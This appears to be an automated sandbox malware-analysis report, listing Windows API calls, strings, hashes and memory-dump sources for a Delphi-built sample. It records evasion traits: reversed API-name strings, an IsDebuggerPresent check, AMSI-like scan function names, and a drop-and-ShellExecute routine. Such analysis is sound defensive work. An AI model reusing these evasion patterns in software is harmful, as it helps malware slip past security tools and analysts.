                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                  • Opcode ID: 393ef1a1b54348a3c6172fcf68659550f2fa13eff9bc939c84bfc5d31eff7e6f
                                                                                                                  • Instruction ID: 530600993e5631903b31e9d6044c4bb7379229271e5a78c023a647ede92f3210
                                                                                                                  • Opcode Fuzzy Hash: 393ef1a1b54348a3c6172fcf68659550f2fa13eff9bc939c84bfc5d31eff7e6f
                                                                                                                  • Instruction Fuzzy Hash: 2001B5759C0218BAFB12DB919D06BBD77ECD708B40F5089A1FA08DA680E674A910DA59
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                  • Opcode ID: b7dd2aad78f2876d4a2970252937b18df85fce9bf21efcdeb01ea6e4c586845e
                                                                                                                  • Instruction ID: 7a45b6783e075d59d10dab92b45a84863ab79e062381e45f0a6e6a393eb312c9
                                                                                                                  • Opcode Fuzzy Hash: b7dd2aad78f2876d4a2970252937b18df85fce9bf21efcdeb01ea6e4c586845e
                                                                                                                  • Instruction Fuzzy Hash: 60014F746C4304BFEB14EBA4EC49A6EB7AEEB49B50F91D460B800DB640E674A940DA24
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02E6AAE7,?,?,00000000), ref: 02E6AA68
                                                                                                                    • Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E6AAE7,?,?,00000000), ref: 02E6AA98
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02E6AAA3
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E6AAE7,?,?,00000000), ref: 02E6AAC1
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02E6AACC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4102113445-0
                                                                                                                  • Opcode ID: 7350c1a148f693cfccac241d111f43daf5b10796b31d5be80c34f7067734da48
                                                                                                                  • Instruction ID: be892b1dfbddbbd74e1e818b0777b9eda55297fc81f581978ea075117768ced9
                                                                                                                  • Opcode Fuzzy Hash: 7350c1a148f693cfccac241d111f43daf5b10796b31d5be80c34f7067734da48
                                                                                                                  • Instruction Fuzzy Hash: C6014770AD02046FFA11BB64DD1AB3E335DDB41790F50E171F002B67C0D57A9E008A24
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02E6ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E6AB2F
                                                                                                                    • Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                  • Opcode ID: a878f3900cccd64de5308ee9aaf8aadb3b3f357fddaae283aa82baac2b0141d4
                                                                                                                  • Instruction ID: b6d8c9521259de7803f4d7a9fc40ed7e7ecec6c10864a8417bfc18566e713f41
                                                                                                                  • Opcode Fuzzy Hash: a878f3900cccd64de5308ee9aaf8aadb3b3f357fddaae283aa82baac2b0141d4
                                                                                                                  • Instruction Fuzzy Hash: DA41B170FC41454B9721EA78889C6FEB6E7EB823C4B54F535B452E3384EA34E901CA25
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                  • Opcode ID: d4562c82cb34d9b6c4e9ed4a807c83bb1403658dae325fa821b488da78bd3c24
                                                                                                                  • Instruction ID: 6bec548f636c082b896bff1f43282e64b2f6d49e05da86f2ce796f72fa39c06b
                                                                                                                  • Opcode Fuzzy Hash: d4562c82cb34d9b6c4e9ed4a807c83bb1403658dae325fa821b488da78bd3c24
                                                                                                                  • Instruction Fuzzy Hash: 1BF09670AC4744EFEB11EFA5EC0996AB7EDE76A740791D461F804C7610D670AE10DA24
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02E7FAEB,UacInitialize,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize), ref: 02E7F6EE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E7F700
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 1646373207-2367923768
                                                                                                                  • Opcode ID: 5fbd4a30bbc4466749e077467ed74c74d9723bbc769f31329592959ed47d7ae3
                                                                                                                  • Instruction ID: d3f57e9db3f52f2ddc3647753cd556274ca017315995e9406a9baa8b2e069fef
                                                                                                                  • Opcode Fuzzy Hash: 5fbd4a30bbc4466749e077467ed74c74d9723bbc769f31329592959ed47d7ae3
                                                                                                                  • Instruction Fuzzy Hash: A0D012A13F035019FE0073F42CC882D038C899457E320BF20F023C6492E5BA88155015
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02E8D10B,00000000,02E8D11E), ref: 02E6C47A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E6C48B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                  • Opcode ID: b36d9e5c836fb7e5f4b0c3a8b39f10d9a29d783a4e35364407837c5fc30af3fe
                                                                                                                  • Instruction ID: a2b497ad52e41d43a255480f1278b4ecc64ec5286380feaba7d862ac026defe4
                                                                                                                  • Opcode Fuzzy Hash: b36d9e5c836fb7e5f4b0c3a8b39f10d9a29d783a4e35364407837c5fc30af3fe
                                                                                                                  • Instruction Fuzzy Hash: 23D05EA0AC03556EE600EBB2688C63A269883083D8F68F827F48649500E7B658508F15
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E6E297
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E6E2B3
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E6E32A
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 02E6E353
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 920484758-0
                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction ID: da11094e24216840815a113e1987f401c443b39af0a13694a3297585e0749a71
                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction Fuzzy Hash: 42414D79A812198FCB62DB58CC98FE9B3BDAF49344F0891D5E54CE7251DA30AF808F50
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: 1f9f4af902cdfc362617827507d63b9f162eeb9110f8fdc8efe0fc512a85612a
                                                                                                                  • Instruction ID: 5ef519a6d160bb5cb4296cdad5145b653448c56c7d5833aa86167779a0bc562e
                                                                                                                  • Opcode Fuzzy Hash: 1f9f4af902cdfc362617827507d63b9f162eeb9110f8fdc8efe0fc512a85612a
                                                                                                                  • Instruction Fuzzy Hash: BA412B70EC02589BDB21DB68CC88BEAB7FDAB18384F4490E5A548E7341D774AF848F50
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: ed557031440ba8d0b898d3d919bdf1c35488626a5d30dca7878451e447b96384
                                                                                                                  • Instruction ID: 23e464fc807e896f401009dec361d61b2836683f9332d508fe2b389d89f9a549
                                                                                                                  • Opcode Fuzzy Hash: ed557031440ba8d0b898d3d919bdf1c35488626a5d30dca7878451e447b96384
                                                                                                                  • Instruction Fuzzy Hash: 78413B70EC02589BDB21DB68CC88BEAB7FDAB18384F4494E5A548E7341D774AF848F50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80893facbb9b615517e3106bffa76b6793d2ff7c8d3e37742def23d59a280e6c
                                                                                                                  • Instruction ID: 63f4aeecba29617b0708ee0439590bc57043be74691a1ca2c480751243efaa9c
                                                                                                                  • Opcode Fuzzy Hash: 80893facbb9b615517e3106bffa76b6793d2ff7c8d3e37742def23d59a280e6c
                                                                                                                  • Instruction Fuzzy Hash: 07A1FAA67D06004BD71AAA7D9C883BDB3C29BC53A9F18D27EF11DCF381DB64C9518650
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E695DA), ref: 02E69572
                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E695DA), ref: 02E69578
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                  • String ID: yyyy
                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                  • Opcode ID: 1e1a19342784d5a7cb3f9a90b4749f4a28c2b86b27eea735ef5fe5a2d8d0c364
                                                                                                                  • Instruction ID: 8f070cefb3e5f5259d8c0dd5da1395fc83cb95faeb82f3e195aad9e98aacb51d
                                                                                                                  • Opcode Fuzzy Hash: 1e1a19342784d5a7cb3f9a90b4749f4a28c2b86b27eea735ef5fe5a2d8d0c364
                                                                                                                  • Instruction Fuzzy Hash: F1217471AC01589FDB11DF64C845ABE73B9EF09750F4190A5F805E7291D730DE40CB65
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                  • Opcode ID: b5851a06c068e7e437e264b3fa8d41cfe112ae3c9dd2b2c99b68c9fd3c743551
                                                                                                                  • Instruction ID: c176828ae27d72acd49d1fddd6d3a3a7203260fb4aa5d39ccb2edbb105fc1d7b
                                                                                                                  • Opcode Fuzzy Hash: b5851a06c068e7e437e264b3fa8d41cfe112ae3c9dd2b2c99b68c9fd3c743551
                                                                                                                  • Instruction Fuzzy Hash: 2F016D716C0304FFEB50EFA9DC4AF6A77EDE719B00F91E460B904D6680E670AD509B24
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7AF58
                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02E7AF88
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02E7AFA7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7AFB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$Write
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3448952669-0
                                                                                                                  • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction ID: 932ac9ea27fb5274c7dc6a1a8d44fbc608759ae055551e13540fa783a88c96d8
                                                                                                                  • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction Fuzzy Hash: F021B4B26806199BDB24DF6ADC80BAE73AAEF40355F00D521FD14D7380D738E8118BA0

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:27.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:3.1%
                                                                                                                  Total number of Nodes:32
                                                                                                                  Total number of Limit Nodes:2

                                                                                                                  Callgraph

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                  • String ID: %s\%s
                                                                                                                  • API String ID: 2742963760-4073750446
                                                                                                                  • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                  • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                  • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                  • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
